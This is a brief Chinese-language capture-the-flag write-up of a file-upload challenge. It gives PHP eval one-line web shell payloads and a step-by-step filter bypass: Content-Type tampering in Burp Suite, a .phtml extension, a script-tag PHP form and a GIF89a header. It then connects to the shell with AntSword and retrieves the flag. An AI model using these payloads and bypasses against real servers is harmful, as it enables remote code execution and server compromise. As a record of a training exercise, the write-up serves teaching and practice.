打开之后是一个文件上传的题，先上传一个php文件试试

一句话木马文件内容为<?php eval($_POST['hhh']);?>

提示不是一个图片

初步猜测是修改Content-Type，抓包试试

使用burpsuite抓包

但是仍然显示

尝试修改php后缀

前几个均无果

不过尝试.phtml时，出现不同，原来文件内容不能包括'<?' 

修改文件内容为<script language="php">eval($_POST['hhh'])</script>，作用一样，可是显示Dont't lie to me,it's not image at all!!!

 后来查询，原来是需要写一个图片文件头，修改文件内容为GIF89a? <script language="php">eval($_POST['hhh'])</script>，上传成功！

 然后找文件路径，一般都在upload文件夹内，输入试试，果然在 并找到我们上传的文件

 然后用蚁剑连接一下

 连接成功

 在这里找到flag

 点击进入